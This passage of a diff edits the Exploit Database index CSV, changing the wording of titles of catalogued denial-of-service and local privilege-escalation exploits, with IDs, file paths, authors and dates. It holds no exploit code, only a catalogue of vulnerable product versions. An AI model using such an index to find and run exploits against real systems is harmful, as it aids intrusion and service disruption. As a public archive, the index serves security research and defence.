Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 -18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 +18457,platforms/linux/dos/18457.py,"torrent-stats - 'httpd.c' Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0 @@ -2340,7 +2340,7 @@ id,file,description,date,author,platform,type,port 19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",linux,dos,0 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",windows,dos,0 -19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service",2000-01-05,"Ussr Labs",windows,dos,0 +19711,platforms/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor 'status.cgi' Denial of Service",2000-01-05,"Ussr Labs",windows,dos,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19720,platforms/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",windows,dos,0 19725,platforms/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",windows,dos,0 @@ -2506,7 +2506,7 @@ id,file,description,date,author,platform,type,port 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0 -20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0 +20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,windows,dos,0 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,windows,dos,0 @@ -2728,7 +2728,7 @@ id,file,description,date,author,platform,type,port 21971,platforms/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos,0 21972,platforms/windows/dos/21972.pl,"SmartMail Server 2.0 - Closed Connection Denial of Service",2002-10-31,"securma massine",windows,dos,0 21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 -21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 +21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - 'Gozila.cgi' Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos,0 21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0 @@ -3022,7 +3022,7 @@ id,file,description,date,author,platform,type,port 23305,platforms/linux/dos/23305.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow (PoC)",2003-10-27,"Joel Soderberg",linux,dos,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,php,dos,0 -23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 +23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0 23347,platforms/linux/dos/23347.txt,"IBM DB2 db2start - Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos,0 @@ -3046,7 +3046,7 @@ id,file,description,date,author,platform,type,port 23460,platforms/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",php,dos,0 23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos,0 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,windows,dos,0 -23480,platforms/windows/dos/23480.txt,"Surfboard httpd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",windows,dos,0 +23480,platforms/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",windows,dos,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos,0 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 @@ -3100,7 +3100,7 @@ id,file,description,date,author,platform,type,port 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos,0 23716,platforms/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",windows,dos,0 -23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 +23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit - Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0 @@ -3158,7 +3158,7 @@ id,file,description,date,author,platform,type,port 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos,0 -24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Command Denial of Service",2004-05-04,storm,windows,dos,0 +24080,platforms/windows/dos/24080.pl,"Titan FTP Server 3.0 - 'LIST' Denial of Service",2004-05-04,storm,windows,dos,0 24095,platforms/linux/dos/24095.txt,"DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow",2004-05-06,"Joel Eriksson",linux,dos,0 24096,platforms/linux/dos/24096.pl,"Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun",2004-05-07,"Paul Szabo",linux,dos,0 24103,platforms/windows/dos/24103.txt,"MailEnable Mail Server HTTPMail 1.x - Remote Heap Overflow",2004-05-09,"Behrang Fouladi",windows,dos,0 @@ -3396,7 +3396,7 @@ id,file,description,date,author,platform,type,port 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (OSX) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 -25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 +25837,platforms/linux/dos/25837.txt,"Monkey HTTPd 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS - Denial of Service",2005-08-22,"Mella Marco",osx,dos,0 25852,platforms/multiple/dos/25852.py,"ModSecurity - Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service",2005-06-28,fRoGGz,windows,dos,0 @@ -3564,7 +3564,7 @@ id,file,description,date,author,platform,type,port 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 -27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow",2006-05-29,kcope,windows,dos,0 +27914,platforms/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow",2006-05-29,kcope,windows,dos,0 27915,platforms/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,multiple,dos,0 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 @@ -3926,7 +3926,7 @@ id,file,description,date,author,platform,type,port 31057,platforms/ios/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,ios,dos,0 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0 31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 - SNMP SET Denial of Service",2008-02-04,ShadOS,hardware,dos,0 -31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 +31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 31128,platforms/multiple/dos/31128.txt,"IEA Software (Multiple Products) - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 @@ -3955,7 +3955,7 @@ id,file,description,date,author,platform,type,port 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0 40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos,0 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0 -31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 +31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31308,platforms/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 @@ -4004,7 +4004,7 @@ id,file,description,date,author,platform,type,port 31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0 40825,platforms/windows/dos/40825.py,"Remote Utilities Host 6.3 - Denial of Service",2016-11-24,"Peter Baris",windows,dos,0 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 -31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' Command Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0 +31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - 'stats' Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0 31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,windows,dos,0 31761,platforms/linux/dos/31761.txt,"Embedthis Goahead WebServer 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 31762,platforms/windows/dos/31762.py,"Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 @@ -4069,7 +4069,7 @@ id,file,description,date,author,platform,type,port 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos,0 32304,platforms/linux/dos/32304.txt,"RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service",2008-08-27,"Ulf Weltman",linux,dos,0 32305,platforms/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",hardware,dos,0 -32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Command Remote Denial of Service",2008-09-02,Antunes,multiple,dos,0 +32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 - 'APPEND' Remote Denial of Service",2008-09-02,Antunes,multiple,dos,0 32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 - Malformed 'title' Tag Remote Denial of Service",2008-09-02,Exodus,multiple,dos,0 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal Exploit (SEH) (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 @@ -4204,7 +4204,7 @@ id,file,description,date,author,platform,type,port 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33205,platforms/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 -33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 +33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 33221,platforms/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion (Denial of Service)",2009-09-15,"Buildbot Builder",linux,dos,0 33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 @@ -4240,7 +4240,7 @@ id,file,description,date,author,platform,type,port 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 - 'core_get_proxyauth_dn' Denial of Service",2010-01-10,Intevydis,multiple,dos,0 33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2 build 535 (32-bi)t - Crash (PoC)",2014-05-24,"Kaczinski Ramirez",windows,dos,0 -33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial of Service",2010-01-29,"Julien Cristau",linux,dos,0 +33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Denial of Service",2010-01-29,"Julien Cristau",linux,dos,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre - PJL Daemon Buffer Overflow",2009-12-31,"Francis Provencher",hardware,dos,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption",2010-01-12,"Dennis Yurichev",multiple,dos,0 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 @@ -4506,7 +4506,7 @@ id,file,description,date,author,platform,type,port 36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 -36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 +36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Remote Denial of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36405,platforms/windows/dos/36405.txt,"Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass",2011-12-05,"Luigi Auriemma",windows,dos,0 @@ -4548,12 +4548,12 @@ id,file,description,date,author,platform,type,port 36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)",2015-05-04,beford,linux,dos,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 -36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 +36972,platforms/windows/dos/36972.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow",2012-03-19,"brock haun",windows,dos,0 37014,platforms/windows/dos/37014.py,"iFTP 2.21 - Buffer Overflow Crash (PoC)",2015-05-14,"dogo h@ck",windows,dos,0 37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 - Denial of Service",2012-03-31,r45c4l,linux,dos,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",linux,dos,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos,0 -37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 +37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - 'Registration ID' Buffer Overflow (PoC)",2015-05-26,LiquidWorm,windows,dos,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash (PoC)",2015-05-29,3unnym00n,windows,dos,22 @@ -5255,8 +5255,8 @@ id,file,description,date,author,platform,type,port 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 40617,platforms/windows/dos/40617.txt,"RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)",2016-10-21,"Alwin Peppels",windows,dos,0 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0 -40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 -40647,platforms/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Command Denial of Service",2016-10-31,ScrR1pTK1dd13,windows,dos,0 +40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Denial of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 +40647,platforms/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Denial of Service",2016-10-31,ScrR1pTK1dd13,windows,dos,0 40648,platforms/windows/dos/40648.txt,"Micro Focus Rumba 9.4 - Local Denial of Service",2016-10-31,"Umit Aksu",windows,dos,0 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial of Service",2016-10-27,"Peter Baris",windows,dos,0 40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0 @@ -5542,7 +5542,7 @@ id,file,description,date,author,platform,type,port 42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow (PoC)",2017-06-05,FarazPajohan,linux,dos,0 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 -42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 +42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0 42135,platforms/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",android,dos,0 42136,platforms/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",linux,dos,0 42137,platforms/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",linux,dos,22 @@ -5873,7 +5873,7 @@ id,file,description,date,author,platform,type,port 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0 -701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0 +701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 @@ -6623,7 +6623,7 @@ id,file,description,date,author,platform,type,port 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (2)",2009-10-16,"Dragon Rider",windows,local,0 -9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' file Buffer Overflow",2009-10-26,Dr_IDE,windows,local,0 +9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 - '.xpas' File Buffer Overflow",2009-10-26,Dr_IDE,windows,local,0 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,windows,local,0 @@ -7247,7 +7247,7 @@ id,file,description,date,author,platform,type,port 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local,0 -18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0 +18038,platforms/windows/local/18038.rb,"GTA SA-MP - 'server.cfg' Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0 